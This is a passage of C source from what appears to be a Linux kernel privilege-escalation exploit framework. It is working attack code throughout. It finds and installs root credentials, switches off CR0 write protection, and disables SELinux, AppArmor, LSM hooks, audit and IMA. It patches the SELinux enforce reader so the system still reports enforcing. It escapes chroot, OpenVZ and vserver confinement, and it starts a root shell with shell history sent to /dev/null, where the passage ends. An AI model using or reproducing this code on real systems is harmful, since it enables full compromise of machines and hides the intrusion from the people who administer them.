  867.     int uid; // 0
  868.     int gid; // 0
  869.     int suid; // 0
  870.     int sgid; // 0
  871.     int euid; // 0
  872.     int egid; // 0
  873.     int fsuid; // 0
  874.     int fsgid; // 0
  875.     int securebits; // SECUREBITS_DEFAULT 0x00000000
  876.     unsigned int cap_inheritable[2]; // CAP_INIT_INH_SET {0, 0}
  877.     unsigned int cap_permitted[2]; // CAP_FULL_SET { ~0, ~0 }
  878.     unsigned int cap_effective[2]; // CAP_INIT_EFF_SET { ~(1 << 8), ~0 }
  879.     unsigned int cap_bset[2]; // CAP_INIT_BSET -> CAP_FULL_SET || CAP_INIT_EFF_SET
  880. };
  881.  
  882. static inline unsigned long *pg_to_ptr(unsigned long addr)
  883. {
  884.     return (unsigned long *)(0xffff880000000000UL + (addr & 0x000ffffffffff000UL));
  885. }
  886.  
  887. static inline unsigned long pte_to_kaddr(unsigned long pte)
  888. {
  889.     return 0xffffffff80000000UL + (pte & 0x000ffffffffff000UL);
  890. }
  891.  
  892. #define NUM_RANGES 32
  893.  
  894. static unsigned long valid_ranges[NUM_RANGES][2];
  895.  
  896. /* elito #2 */
  897. static inline void find_kernel_ranges(void)
  898. {
  899.     unsigned long i, z, t;
  900.     unsigned long _cr3;
  901.     unsigned long *kernelpg;
  902.     unsigned long *kernelpte;
  903.     int rangeidx = 0;
  904.     int x = -1;
  905.  
  906.     if (valid_ranges[0][0])
  907.         return;
  908.  
  909.     asm volatile (
  910.     "mov %%cr3, %0"
  911.     : "=r" (_cr3)
  912.     );
  913.  
  914.     kernelpg = pg_to_ptr(pg_to_ptr(pg_to_ptr(_cr3)[511])[510]);
  915.     for (i = 0; i < 511; i++) {
  916.         if ((kernelpg[i] & 1) && x < 0) {
  917.             x = i;
  918.         }
  919.         if (!(kernelpg[i+1] & 1) && x >= 0) {
  920.             break;
  921.         }
  922.     }
  923.     for (z = x; z <= i; z++) {
  924.         // large page
  925.         if ((kernelpg[z] & (1 << 7)) && !valid_ranges[rangeidx][0])
  926.             valid_ranges[rangeidx][0] = pte_to_kaddr(kernelpg[z]);
  927.         else if (!(kernelpg[z] & (1 << 7))) {
  928.             // check 4K pages
  929.             kernelpte = pg_to_ptr(kernelpg[z]);
  930.             for (t = 0; t < 511; t++) {
  931.                 if ((kernelpte[t] & 0x1) && !valid_ranges[rangeidx][0])
  932.                     valid_ranges[rangeidx][0] = pte_to_kaddr(kernelpte[t]);
  933.                 else if (!(kernelpte[t] & 0x1) && !valid_ranges[rangeidx][1]) {
  934.                     valid_ranges[rangeidx][1] = pte_to_kaddr(kernelpg[z]);
  935.                     rangeidx++;
  936.                 }
  937.                 else if (!(kernelpte[t+1] & 0x1) && !valid_ranges[rangeidx][1]) {
  938.                     valid_ranges[rangeidx][1] = pte_to_kaddr(kernelpte[t]) + 0x1000;
  939.                     rangeidx++;
  940.                 }
  941.             }
  942.         }
  943.     }
  944.     if (valid_ranges[rangeidx][0] && !valid_ranges[rangeidx][1]) {
  945.         valid_ranges[rangeidx][1] = pte_to_kaddr(kernelpg[i]) + 0x200000;
  946.     }
  947. }
  948.  
  949. static inline unsigned long find_init_cred(void)
  950. {
  951.     unsigned long len;
  952.     struct cred *tmp;
  953.     int i, x;
  954.  
  955.     find_kernel_ranges();
  956.     if (!valid_ranges[0][0] || !valid_ranges[0][1])
  957.         return 0;
  958.  
  959.     for (x = 0; valid_ranges[x][0]; x++) {
  960.     for (i = 0; i < valid_ranges[x][1] - valid_ranges[x][0] - sizeof(struct cred); i++) {
  961.         tmp = (struct cred *)valid_ranges[x][0];
  962.         if (tmp->usage >= 4 && tmp->uid == 0 && tmp->gid == 0 &&
  963.             tmp->suid == 0 && tmp->sgid == 0 && tmp->euid == 0 &&
  964.             tmp->egid == 0 && tmp->fsuid == 0 && tmp->fsgid == 0 &&
  965.             tmp->securebits == 0 && tmp->cap_inheritable[0] == 0 &&
  966.             tmp->cap_inheritable[1] == 0 && tmp->cap_permitted[0] == ~0 &&
  967.             tmp->cap_permitted[1] == ~0 &&
  968.             (tmp->cap_effective[0] == ~(1 << 8) || tmp->cap_effective[0] == ~0) &&
  969.             tmp->cap_effective[1] == ~0 &&
  970.             (tmp->cap_bset[0] == ~0 || tmp->cap_bset[0] == ~(1 << 8)) &&
  971.             tmp->cap_bset[1] == ~0)
  972.             return (unsigned long)tmp;
  973.     }
  974.     }
  975.  
  976.     return 0UL;
  977. }
  978.  
  979. static void bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club(unsigned long orig_current)
  980. {
  981.     /* cause it's a trillion dollar industry */
  982.     unsigned char *current = (unsigned char *)orig_current;
  983.     struct cred *init_cred_addr, **cred, **real_cred;
  984.     int i;
  985.  
  986.     init_cred_addr = (struct cred *)find_init_cred();
  987.     if (!init_cred_addr)
  988.         return;
  989.  
  990.     /* ok, we couldn't find our UIDs in the task struct
  991.        and we don't have the symbols for the creds
  992.        framework, discover it in a stupidly easy way:
  993.        in task_struct:
  994.        ...stuff...
  995.        const struct cred *real_cred;
  996.        const struct cred *cred;
  997.        struct mutex cred_exec_mutex;
  998.        char comm[16];
  999.        ...stuff...
  1000.  
  1001.        if we were executed from main, then our name is
  1002.        "exploit", otherwise it's "pulseaudio"
  1003.        then we find init_cred through heuristics
  1004.        increment its refcnt appropriately
  1005.        and set up our credentials
  1006.     */
  1007.  
  1008.     for (i = 0; i < 0x1000 - 16; i++) {
  1009.         if ((exp_state.run_from_main == 1 && !memcmp(&current[i], "exploit", strlen("exploit") + 1)) ||
  1010.             (exp_state.run_from_main == 0 && !memcmp(&current[i], "pulseaudio", strlen("pulseaudio") + 1))) {
  1011.             /* now work backwards till we find the two cred pointers
  1012.             */
  1013.             for (i-=sizeof(unsigned long); i > sizeof(unsigned long); i-=sizeof(unsigned long)) {
  1014.                 if (*((unsigned long *)&current[i]) != *((unsigned long *)&current[i-sizeof(unsigned long)]))
  1015.                     continue;
  1016.                  // unlocked
  1017.                 cred_offset = i - sizeof(char *);
  1018.                 real_cred = (struct cred **)&current[i-sizeof(char *)];
  1019.                 cred = (struct cred **)&current[i];
  1020.                 /* found init_cred, so now point our
  1021.                    cred struct to it, and increment usage!
  1022.                 */
  1023.                 *real_cred = *cred = init_cred_addr;
  1024.                 init_cred_addr->usage+=2;
  1025.                 exp_state.got_root = 1;
  1026.                 return;
  1027.             }
  1028.             return;
  1029.         }
  1030.     }
  1031.     return;
  1032. }
  1033.  
  1034. static void give_it_to_me_any_way_you_can(void)
  1035. {
  1036.     unsigned long orig_current;
  1037.  
  1038.     orig_current = get_current_4k();
  1039.     if (orig_current == 0)
  1040.         orig_current = get_current_8k();
  1041.  
  1042.     current_addr = orig_current;
  1043.  
  1044.     if (commit_creds && prepare_kernel_cred) {
  1045.         commit_creds(prepare_kernel_cred(0));
  1046.         exp_state.got_root = 1;
  1047.     } else {
  1048.         unsigned int *current;
  1049.  
  1050.         current = (unsigned int *)orig_current;
  1051.         while (((unsigned long)current < (orig_current + 0x1000 - 17 )) &&
  1052.             (current[0] != our_uid || current[1] != our_uid ||
  1053.              current[2] != our_uid || current[3] != our_uid))
  1054.             current++;
  1055.  
  1056.         if ((unsigned long)current >= (orig_current + 0x1000 - 17 )) {
  1057.             bella_mafia_quackafella_records_incorporated_by_rhyme_syndicate_three_yellow_men_trillionaire_club(orig_current);
  1058.             cred_support = 1;
  1059.             return;
  1060.         }
  1061.         exp_state.got_root = 1;
  1062.         /* clear the UIDs and GIDs */
  1063.         memset(current, 0, sizeof(unsigned int) * 8);
  1064.         /* now let's try to elevate our capabilities as well (pre-creds structure)
  1065.            2.4 has next: int ngroups; gid_t groups[NGROUPS]; then caps
  1066.            2.6 has next: struct group_info *group_info; then caps
  1067.            we could actually capget, but lets assume all three are 0
  1068.            in both cases, the capabilities occur before:
  1069.             unsigned keep_capabilities:1;
  1070.             struct user_struct *user;
  1071.            so we'll be fine with clobbering all 0s in between
  1072.           */
  1073.         {
  1074.             int i;
  1075.             int zeroed;
  1076.  
  1077.             current += 8; // skip uids/gids
  1078.             /* skip over any next pointer */
  1079.             current += (sizeof(unsigned long) == sizeof(unsigned int)) ? 1 : 2;
  1080.             for (i = 0; i < 40; i++) {
  1081.                 if (!current[i]) {
  1082.                     zeroed = 1;
  1083.                     current[i] = 0xffffffff;
  1084.                     raised_caps = 1;
  1085.                 /* once we zero a block, stop when we
  1086.                    find something non-zero
  1087.                 */
  1088.                 } else if (zeroed)
  1089.                     break;
  1090.             }
  1091.         }
  1092.     }
  1093.  
  1094.     return;
  1095. }
  1096.  
  1097. unsigned long inline get_cr0(void)
  1098. {
  1099.     unsigned long _cr0;
  1100.  
  1101.     asm volatile (
  1102.     "mov %%cr0, %0"
  1103.     : "=r" (_cr0)
  1104.     );
  1105.  
  1106.     return _cr0;
  1107. }
  1108.  
  1109. void inline set_cr0(unsigned long _cr0)
  1110. {
  1111.     asm volatile (
  1112.     "mov %0, %%cr0"
  1113.     :
  1114.     : "r" (_cr0)
  1115.     );
  1116. }
  1117.  
  1118. int inline turn_off_wp(void)
  1119. {
  1120.     unsigned long _cr0;
  1121.  
  1122.     /* if xen is enabled and we can change ptes then we'll do that */
  1123.     if (can_change_ptes)
  1124.         return 1;
  1125.     /* don't do it if xen is enabled and we can't just
  1126.        write to kernel .text */
  1127.     if (xen_detected && mark_rodata_ro && set_kernel_text_ro)
  1128.         return 0;
  1129.     /* if it's just xen, don't use cr0 or we'll GPF */
  1130.     if (xen_detected)
  1131.         return 1;
  1132.  
  1133.     _cr0 = get_cr0();
  1134.     _cr0 &= ~0x10000;
  1135.     set_cr0(_cr0);
  1136.  
  1137.     return 1;
  1138. }
  1139.  
  1140. void inline turn_on_wp(void)
  1141. {
  1142.     unsigned long _cr0;
  1143.  
  1144.     /* if it's just xen, don't use cr0 or we'll GPF */
  1145.     if (xen_detected)
  1146.         return;
  1147.  
  1148.     _cr0 = get_cr0();
  1149.     _cr0 |= 0x10000;
  1150.     set_cr0(_cr0);
  1151. }
  1152.  
  1153. unsigned long trigger_retaddr;
  1154.  
  1155. unsigned long user_cs;
  1156. unsigned long user_ss;
  1157. unsigned long user_gs;
  1158.  
  1159. static void get_segment_descriptors(void)
  1160. {
  1161. #ifdef __x86_64__
  1162.     asm volatile (
  1163.     "movq %%cs, %0 ;"
  1164.     "movq %%ss, %1 ;"
  1165.     : "=r" (user_cs), "=r" (user_ss)
  1166.     :
  1167.     : "memory"
  1168.     );
  1169. #else
  1170.     asm volatile (
  1171.     "push %%cs ;"
  1172.     "pop %0 ;"
  1173.     "push %%ss ;"
  1174.     "pop %1 ;"
  1175.     "push %%gs ;"
  1176.     "pop %2 ;"
  1177.     : "=r" (user_cs), "=r" (user_ss), "=r" (user_gs)
  1178.     :
  1179.     : "memory"
  1180.     );
  1181. #endif
  1182. }
  1183.  
  1184.  
  1185. /* greets to qaaz */
  1186. static void exit_kernel(void)
  1187. {
  1188. #ifdef __x86_64__
  1189.     asm volatile (
  1190.     "swapgs ;"
  1191.     "movq %0, 0x20(%%rsp) ;"
  1192.     "movq %1, 0x18(%%rsp) ;"
  1193.     "movq %2, 0x10(%%rsp) ;"
  1194.     "movq %3, 0x08(%%rsp) ;"
  1195.     "movq %4, 0x00(%%rsp) ;"
  1196.     "iretq"
  1197.     : : "r" (user_ss), "r" (exit_stack + (1024 * 1024) - 0x80), "i" (USER_EFLAGS),
  1198.     "r" (user_cs), "r" (trigger_retaddr)
  1199.     );
  1200. #else
  1201.     asm volatile (
  1202.     "pushl %0 ;"
  1203.     "pop %%gs ;"
  1204.     "movl %1, 0x10(%%esp) ;"
  1205.     "movl %2, 0x0c(%%esp) ;"
  1206.     "movl %3, 0x08(%%esp) ;"
  1207.     "movl %4, 0x04(%%esp) ;"
  1208.     "movl %5, 0x00(%%esp) ;"
  1209.     "iret"
  1210.     : : "r" (user_gs), "r" (user_ss), "r" (exit_stack + (1024 * 1024) - 0x80), "i" (USER_EFLAGS),
  1211.     "r" (user_cs), "r" (trigger_retaddr)
  1212.     );
  1213. #endif
  1214. }
  1215.  
  1216. static _trigger_the_bug trigger;
  1217. static int main_ret;
  1218.  
  1219. void trigger_get_return(void)
  1220. {
  1221.     trigger_retaddr = (unsigned long)__builtin_return_address(0);
  1222.     main_ret = trigger();
  1223.     if (!main_ret)
  1224.         exit(0);
  1225.     return;
  1226. }
  1227.  
  1228. static void make_range_readwrite(unsigned long start, unsigned long len)
  1229. {
  1230.     unsigned long end;
  1231.  
  1232.     if (!can_change_ptes)
  1233.         return;
  1234.  
  1235.     end = start + len;
  1236.  
  1237.     make_lowmem_page_readwrite(start);
  1238.  
  1239.     // check if the entire range fits in one page
  1240.     if ((start >> 12) != (end >> 12))
  1241.         make_lowmem_page_readwrite(end);
  1242.  
  1243.     return;
  1244. }
  1245. static void make_range_readonly(unsigned long start, unsigned long len)
  1246. {
  1247.     unsigned long end;
  1248.  
  1249.     if (!can_change_ptes)
  1250.         return;
  1251.  
  1252.     end = start + len;
  1253.  
  1254.     make_lowmem_page_readonly(start);
  1255.  
  1256.     // check if the entire range fits in one page
  1257.     if ((start >> 12) != (end >> 12))
  1258.         make_lowmem_page_readonly(end);
  1259.  
  1260.     return;
  1261. }
  1262.  
  1263. static _ring0_cleanup ring0_cleanup;
  1264. static unsigned long get_kallsyms_lookup_name(void);
  1265.  
  1266. static int return_to_process_context;
  1267.  
  1268. static inline int are_interrupts_disabled(void)
  1269. {
  1270.     unsigned long flags;
  1271.  
  1272. #ifdef __x86_64
  1273.     asm volatile(
  1274.     "pushfq\n"
  1275.     "mov (%%rsp), %0\n"
  1276.     "popfq\n"
  1277.     : "=r" (flags)
  1278.     );
  1279. #else
  1280.     asm volatile(
  1281.     "pushf\n"
  1282.     "mov (%%esp), %0\n"
  1283.     "popf\n"
  1284.     : "=r" (flags)
  1285.     );
  1286. #endif
  1287.  
  1288.     return !(flags & (1 << 9));
  1289. }
  1290.  
  1291. static inline void chroot_breakout(void)
  1292. {
  1293.     int x, z;
  1294.     unsigned long *fsptr;
  1295.     unsigned long *initfsptr;
  1296.  
  1297.     if (!init_task || !init_fs || !set_fs_root || !set_fs_pwd || !current_addr || !virt_addr_valid)
  1298.         return;
  1299.  
  1300.     initfsptr = (unsigned long *)init_fs;
  1301.  
  1302.     for (x = 0; x < 0x1000/sizeof(unsigned long); x++) {
  1303.         if (init_task[x] != init_fs)
  1304.             continue;
  1305.         fs_offset = x * sizeof(unsigned long);
  1306.         fsptr = (unsigned long *)*(unsigned long *)(current_addr + fs_offset);
  1307.         if (fsptr == NULL)
  1308.             continue;
  1309.         // we replace root and pwd too, so adjust reference counters
  1310.         // accordingly
  1311.         for (z = 0; z < 6; z++) {
  1312.             /* lemony snicket's a series of unfortunate ints */
  1313. #ifdef __x86_64__
  1314.             if (fsptr[z] == 0xffffffff00000000UL)
  1315.                 continue;
  1316. #endif
  1317.             if (virt_addr_valid(fsptr[z]) && virt_addr_valid(fsptr[z+1]) &&
  1318.                 virt_addr_valid(fsptr[z+2]) && virt_addr_valid(fsptr[z+3])) {
  1319.                 set_fs_root((unsigned long)fsptr, (unsigned long)&initfsptr[z]);
  1320.                 set_fs_pwd((unsigned long)fsptr, (unsigned long)&initfsptr[z+2]);
  1321.                 return;
  1322.             }
  1323.         }
  1324.         return;
  1325.     }
  1326. }
  1327.  
  1328. struct vserver_struct {
  1329.     unsigned long val1;
  1330.     unsigned long val2;
  1331.     unsigned int val3;
  1332.     unsigned int val4;
  1333. };
  1334.  
  1335. static inline void vserver_breakout(void)
  1336. {
  1337.     char zeroes[32] = {};
  1338.     int vserver_base;
  1339.     unsigned int *vinfo, *ninfo;
  1340.     unsigned long *curr;
  1341.     struct vserver_struct *vserv;
  1342.     int x;
  1343.  
  1344.     if (!init_task || !current_addr || !virt_addr_valid || !vc_sock_stat)
  1345.         return;
  1346.  
  1347.     for (x = 0; x < 0x1000/sizeof(unsigned long); x++) {
  1348.         vserver_base = x * sizeof(unsigned long);
  1349.         vserv = (struct vserver_struct *)(current_addr + vserver_base);
  1350. #ifdef __x86_64__
  1351.         if (!memcmp(&init_task[x], &zeroes, 32) &&
  1352.             virt_addr_valid(vserv->val1) && virt_addr_valid(vserv->val2) &&
  1353.             vserv->val3 && vserv->val4) {
  1354.             vinfo = (unsigned int *)vserv->val1;
  1355.             ninfo = (unsigned int *)vserv->val2;
  1356.             if (vinfo[4] == vserv->val3 &&
  1357.                 ninfo[4] == vserv->val4) {
  1358.                 vserver_offset = vserver_base;
  1359.                 memset((void *)(current_addr + vserver_base), 0, sizeof(struct vserver_struct));
  1360.                 break;
  1361.             }
  1362.         }
  1363. #else
  1364.         /* currently broken */
  1365.         break;
  1366.         if (!memcmp(&init_task[x], &zeroes, 16) &&
  1367.             virt_addr_valid(vserv->val1) && virt_addr_valid(vserv->val2) &&
  1368.             vserv->val3 && vserv->val4) {
  1369.             vinfo = (unsigned int *)vserv->val1;
  1370.             ninfo = (unsigned int *)vserv->val2;
  1371.             if (vinfo[2] == vserv->val3 &&
  1372.                 ninfo[2] == vserv->val4) {
  1373.                 has_vserver = 1;
  1374.                 vserver_offset = vserver_base;
  1375.                 memset((void *)(current_addr + vserver_base), 0, sizeof(struct vserver_struct));
  1376.                 break;
  1377.             }
  1378.         }
  1379. #endif
  1380.     }
  1381. }
  1382.  
  1383. static int __attribute__((regparm(3))) own_the_kernel(unsigned long a)
  1384. {
  1385.     _kallsyms_lookup_name lookup;
  1386.  
  1387.     if (return_to_process_context == 1 && ptmx_fops && aio_read_offset) {
  1388.         return_to_process_context = 2;
  1389.         ptmx_fops[aio_read_offset] = 0;
  1390.         goto resume_own;
  1391.     }
  1392.  
  1393.     if (exp_state.got_ring0 == 1) {
  1394.         /* we were already executed, just do nothing this time */
  1395.         return -1;
  1396.     }
  1397.  
  1398.     exp_state.got_ring0 = 1;
  1399.  
  1400.     if (ring0_cleanup)
  1401.         ring0_cleanup();
  1402.  
  1403.     exp_state.kallsyms_lookup_name = lookup = (_kallsyms_lookup_name)get_kallsyms_lookup_name();
  1404.  
  1405.     if (lookup) {
  1406.         set_fs_root = (_set_fs_root)lookup("set_fs_root");
  1407.         set_fs_pwd = (_set_fs_pwd)lookup("set_fs_pwd");
  1408.         virt_addr_valid = (_virt_addr_valid)lookup("__virt_addr_valid");
  1409.         vc_sock_stat = (unsigned long)lookup("vc_sock_stat");
  1410.         prepare_ve0_process = (_prepare_ve0_process)lookup("prepare_ve0_process");
  1411.         init_task = (unsigned long *)lookup("init_task");
  1412.         init_fs = (unsigned long)lookup("init_fs");
  1413.         default_exec_domain = (unsigned long)lookup("default_exec_domain");
  1414.         bad_file_ops = (unsigned long *)lookup("bad_file_ops");
  1415.         bad_file_aio_read = (unsigned long)lookup("bad_file_aio_read");
  1416.         ima_audit = (int *)lookup("ima_audit");
  1417.         ima_file_mmap = (unsigned char *)lookup("ima_file_mmap");
  1418.         ima_bprm_check = (unsigned char *)lookup("ima_bprm_check");
  1419.         ima_path_check = (unsigned char *)lookup("ima_path_check");
  1420.         ima_file_check = (unsigned char *)lookup("ima_file_check");
  1421.         selinux_enforcing = (int *)lookup("selinux_enforcing");
  1422.         selinux_enabled = (int *)lookup("selinux_enabled");
  1423.         apparmor_enabled = (int *)lookup("apparmor_enabled");
  1424.         apparmor_complain = (int *)lookup("apparmor_complain");
  1425.         apparmor_audit = (int *)lookup("apparmor_audit");
  1426.         apparmor_logsyscall = (int *)lookup("apparmor_logsyscall");
  1427.         security_ops = (unsigned long *)lookup("security_ops");
  1428.         default_security_ops = lookup("default_security_ops");
  1429.         sel_read_enforce = lookup("sel_read_enforce");
  1430.         audit_enabled = (int *)lookup("audit_enabled");
  1431.         commit_creds = (_commit_creds)lookup("commit_creds");
  1432.         prepare_kernel_cred = (_prepare_kernel_cred)lookup("prepare_kernel_cred");
  1433.         xen_start_info = (unsigned long *)lookup("xen_start_info");
  1434.         mark_rodata_ro = lookup("mark_rodata_ro");
  1435.         set_kernel_text_ro = lookup("set_kernel_text_ro");
  1436.         make_lowmem_page_readonly = (_make_lowmem_page_readonly)lookup("make_lowmem_page_readonly");
  1437.         make_lowmem_page_readwrite = (_make_lowmem_page_readwrite)lookup("make_lowmem_page_readwrite");
  1438.         ptmx_fops = (unsigned long *)lookup("ptmx_fops");
  1439.     }
  1440.  
  1441.     if (bad_file_ops && bad_file_aio_read) {
  1442.         int t;
  1443.         for (t = 0; t < 30; t++) {
  1444.             if (bad_file_ops[t] == bad_file_aio_read)
  1445.                 aio_read_offset = t;
  1446.         }
  1447.     }
  1448.  
  1449.     if (are_interrupts_disabled() && ptmx_fops && aio_read_offset && !ptmx_fops[aio_read_offset]) {
  1450.         ptmx_fops[aio_read_offset] = (unsigned long)&own_the_kernel;
  1451.         return_to_process_context = 1;
  1452.         exit_kernel();
  1453.     }
  1454.  
  1455. resume_own:
  1456.  
  1457.     if (xen_start_info && *xen_start_info)
  1458.         xen_detected = 1;
  1459.  
  1460.     if (xen_detected && mark_rodata_ro && set_kernel_text_ro && make_lowmem_page_readonly && make_lowmem_page_readwrite)
  1461.         can_change_ptes = 1;
  1462.  
  1463.     if (audit_enabled)
  1464.         *audit_enabled = 0;
  1465.  
  1466.     if (ima_audit)
  1467.         *ima_audit = 0;
  1468.  
  1469.     // disable apparmor
  1470.     if (apparmor_enabled && *apparmor_enabled) {
  1471.         what_we_do |= DISABLED_APPARMOR;
  1472.             *apparmor_enabled = 0;
  1473.         if (apparmor_audit)
  1474.             *apparmor_audit = 0;
  1475.         if (apparmor_logsyscall)
  1476.             *apparmor_logsyscall = 0;
  1477.         if (apparmor_complain)
  1478.             *apparmor_complain = 0;
  1479.     }
  1480.  
  1481.     // disable SELinux
  1482.     if (selinux_enforcing && *selinux_enforcing) {
  1483.         what_we_do |= DISABLED_SELINUX;
  1484.         *selinux_enforcing = 0;
  1485.     }
  1486.  
  1487.     if (!selinux_enabled || (selinux_enabled && *selinux_enabled == 0)) {
  1488.         // trash LSM
  1489.         if (default_security_ops && security_ops) {
  1490.             /* only list it as LSM if we're disabling
  1491.                something other than apparmor */
  1492.             if (*security_ops != default_security_ops)
  1493.                 what_we_do |= DISABLED_LSM;
  1494.             *security_ops = default_security_ops;
  1495.         }
  1496.     }
  1497.  
  1498.     /* TPM this, dedicated to rcvalle, redpig, and the powerglove
  1499.        NOW you're playing with power!
  1500.  
  1501.        IMA only hashes kernel modules loaded or things run/mmap'd executable
  1502.        as root.  This of course doesn't include our exploit.  So let's
  1503.        just stop appending to the TPM'd hash list all together.
  1504.  
  1505.        Of course, clever minds could think of something better to do here with
  1506.        this code, or re-enable it once they were done executing code as root
  1507.     */
  1508.  
  1509.     if (ima_bprm_check && ima_file_mmap && (ima_path_check || ima_file_check)) {
  1510.         if (turn_off_wp()) {
  1511.             if (memcmp(ima_bprm_check, "\x31\xc0\xc3", 3)) {
  1512.                 /* xor eax, eax / retn */
  1513.                 make_range_readwrite((unsigned long)ima_bprm_check, 3);
  1514.                 ima_bprm_check[0] = '\x31';
  1515.                 ima_bprm_check[1] = '\xc0';
  1516.                 ima_bprm_check[2] = '\xc3';
  1517.                 make_range_readonly((unsigned long)ima_bprm_check, 3);
  1518.                 what_we_do |= DISABLED_IMA;
  1519.             }
  1520.             if (memcmp(ima_file_mmap, "\x31\xc0\xc3", 3)) {
  1521.                 /* xor eax, eax / retn */
  1522.                 make_range_readwrite((unsigned long)ima_file_mmap, 3);
  1523.                 ima_file_mmap[0] = '\x31';
  1524.                 ima_file_mmap[1] = '\xc0';
  1525.                 ima_file_mmap[2] = '\xc3';
  1526.                 make_range_readonly((unsigned long)ima_file_mmap, 3);
  1527.                 what_we_do |= DISABLED_IMA;
  1528.             }
  1529.             if (ima_path_check && memcmp(ima_path_check, "\x31\xc0\xc3", 3)) {
  1530.                 /* xor eax, eax / retn */
  1531.                 make_range_readwrite((unsigned long)ima_path_check, 3);
  1532.                 ima_path_check[0] = '\x31';
  1533.                 ima_path_check[1] = '\xc0';
  1534.                 ima_path_check[2] = '\xc3';
  1535.                 make_range_readonly((unsigned long)ima_path_check, 3);
  1536.                 what_we_do |= DISABLED_IMA;
  1537.             }
  1538.             if (ima_file_check && memcmp(ima_file_check, "\x31\xc0\xc3", 3)) {
  1539.                 /* xor eax, eax / retn */
  1540.                 make_range_readwrite((unsigned long)ima_file_check, 3);
  1541.                 ima_file_check[0] = '\x31';
  1542.                 ima_file_check[1] = '\xc0';
  1543.                 ima_file_check[2] = '\xc3';
  1544.                 make_range_readonly((unsigned long)ima_file_check, 3);
  1545.                 what_we_do |= DISABLED_IMA;
  1546.             }
  1547.             turn_on_wp();
  1548.         }
  1549.     }
  1550.  
  1551.     /* if we just set SELinux into permissive mode,
  1552.        make the idiots think selinux is enforcing
  1553.     */
  1554.     if (sel_read_enforce) {
  1555.         unsigned char *p;
  1556.         int can_write;
  1557.         can_write = turn_off_wp();
  1558.  
  1559.         if (sizeof(unsigned int) != sizeof(unsigned long)) {
  1560.             /* 64bit version, look for the mov ecx, [rip+off]
  1561.                and replace with mov ecx, 1
  1562.             */
  1563.             for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x30); p++) {
  1564.                 if (p[0] == 0x8b && p[1] == 0x0d) {
  1565.                     if (!selinux_enforcing) {
  1566.                         // determine address of rip+off, as it's our selinux_enforcing
  1567.                         sel_enforce_ptr = (int *)((char *)p + 6 + *(int *)&p[2]);
  1568.                         if (*sel_enforce_ptr) {
  1569.                             *sel_enforce_ptr = 0;
  1570.                             what_we_do |= DISABLED_SELINUX;
  1571.                         }
  1572.                     }
  1573.                     if (can_write && (what_we_do & DISABLED_SELINUX)) {
  1574.                         make_range_readwrite((unsigned long)p, 6);
  1575.                         p[0] = '\xb9';
  1576.                         p[5] = '\x90';
  1577.                         *(unsigned int *)&p[1] = 1;
  1578.                         make_range_readonly((unsigned long)p, 6);
  1579.                     }
  1580.                 }
  1581.             }
  1582.         } else {
  1583.             /* 32bit, replace push [selinux_enforcing] with push 1 */
  1584.             for (p = (unsigned char *)sel_read_enforce; (unsigned long)p < (sel_read_enforce + 0x20); p++) {
  1585.                 if (p[0] == 0xff && p[1] == 0x35 && *(unsigned int *)&p[2] > 0xc0000000) {
  1586.                     // while we're at it, disable
  1587.                     // SELinux without having a
  1588.                     // symbol for selinux_enforcing ;)
  1589.                     if (!selinux_enforcing) {
  1590.                         sel_enforce_ptr = *(int **)&p[2];
  1591.                         if (*sel_enforce_ptr) {
  1592.                             *sel_enforce_ptr = 0;
  1593.                             what_we_do |= DISABLED_SELINUX;
  1594.                         }
  1595.                     }
  1596.                     if (can_write && (what_we_do & DISABLED_SELINUX)) {
  1597.                         make_range_readwrite((unsigned long)p, 6);
  1598.                         p[0] = '\x68';
  1599.                         p[5] = '\x90';
  1600.                         *(unsigned int *)&p[1] = 1;
  1601.                         make_range_readonly((unsigned long)p, 6);
  1602.                     }
  1603.                 } else if (p[0] == 0xa1 &&
  1604.                     *(unsigned int *)&p[1] > 0xc0000000) {
  1605.                     /* old 2.6 are compiled different */
  1606.                     if (!selinux_enforcing) {
  1607.                         sel_enforce_ptr = *(int **)&p[1];
  1608.                         if (*sel_enforce_ptr) {
  1609.                             *sel_enforce_ptr = 0;
  1610.                             what_we_do |= DISABLED_SELINUX;
  1611.                         }
  1612.                     }
  1613.                     if (can_write && (what_we_do & DISABLED_SELINUX)) {
  1614.                         make_range_readwrite((unsigned long)p, 5);
  1615.                         p[0] = '\xb8';
  1616.                         *(unsigned int *)&p[1] = 1;
  1617.                         make_range_readonly((unsigned long)p, 5);
  1618.                     }
  1619.                 }
  1620.             }
  1621.         }
  1622.  
  1623.         turn_on_wp();
  1624.     }
  1625.  
  1626.     // push it real good
  1627.     give_it_to_me_any_way_you_can();
  1628.  
  1629.     // break out of chroot, mnt namespace
  1630.     chroot_breakout();
  1631.  
  1632.     // break out of OpenVZ
  1633.     if (prepare_ve0_process && current_addr) {
  1634.         prepare_ve0_process(current_addr);
  1635.     }
  1636.  
  1637.     // break out of vserver
  1638.     // find xid/vx_info/nid/nx_info -- they'll be zero in init_task but set in our confined task
  1639.     // once found, zero it out
  1640.     // can be made more reliable by verifying struct with xid info obtained from /proc
  1641.     vserver_breakout();
  1642.  
  1643.     return -1;
  1644. }
  1645.  
  1646. /* we do this so that we can swap the stack out later if we need to upon returning to userland
  1647.    and we won't lose any "local" variables, so the perf_counter exploit can have the same
  1648.   pretty printouts as all the others ;)
  1649.   note that -fomit-frame-pointer is required to pull this hack off
  1650. */
  1651.  
  1652. static unsigned char *mem = NULL;
  1653. static _prepare_for_exploit prepare;
  1654. static _get_exploit_state_ptr get_exploit_state_ptr;
  1655. static _post_exploit post;
  1656. static int requires_null_page;
  1657. static int exp_idx;
  1658.  
  1659. int cwd_dirfd;
  1660.  
  1661. /* more sgrakkyu/twiz love */
  1662. static void exec_rootshell(void)
  1663. {
  1664.     char buf[PATH_MAX+1];
  1665.     struct stat st;
  1666.     int ret;
  1667.  
  1668.     char *argv[] = { "/bin/sh", "-i", NULL };
  1669.     char *argvbash[] = { "/bin/sh", "--norc", "--noprofile", NULL };
  1670.     char *envp[] = { "TERM=linux", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null",
  1671.             "history=/dev/null",
  1672.             "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
  1673.             NULL };
  1674.     char *envpbash[] = { "TERM=linux", "PS1=1",
  1675.             "BASH_HISTORY=/dev/null", "HISTORY=/dev/null",
  1676.             "history=/dev/null",
  1677.             "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
  1678.             NULL };
  1679.     memset(buf, 0, sizeof(buf));
  1680.  
